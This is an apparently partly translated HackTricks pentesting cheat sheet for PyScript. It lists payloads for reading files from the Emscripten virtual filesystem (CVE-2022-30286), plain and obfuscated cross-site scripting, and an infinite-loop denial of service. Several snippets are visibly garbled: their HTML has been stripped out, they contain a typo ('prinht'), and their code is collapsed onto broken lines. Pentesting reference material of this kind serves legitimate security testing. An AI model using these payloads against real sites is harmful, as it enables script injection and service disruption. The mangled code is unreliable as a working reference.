# Pyscript
{{#include ../../banners/hacktricks-training.md}}
## PyScript Pentesting Guide
PyScript je novi okvir razvijen za integraciju Pythona u HTML, tako da se može koristiti zajedno sa HTML-om. U ovom vodiču, naći ćete kako da koristite PyScript za svoje svrhe penetracionog testiranja.
### Dumping / Retrieving files from the Emscripten virtual memory filesystem:
`CVE ID: CVE-2022-30286`\
\
Code:
```html
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out
= fin.read() print(out)
```
### [OOB Data Exfiltration of the Emscripten virtual memory filesystem (monitoring konzole)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`\
\
Kod:
```html
x = "CyberGuy" if x == "CyberGuy": with
open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read()
print(contents) print('
')
```
### Cross Site Scripting (Običan)
Kod:
```python
print("
")
```
### Cross Site Scripting (Python Obfuscated)
Kod:
```python
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
```
### Cross Site Scripting (JavaScript Obfuscation)
Kod:
```html
prinht("
")
```
### DoS napad (Beskonačna petlja)
Kod:
```html
while True:
print(" ")
```
{{#include ../../banners/hacktricks-training.md}}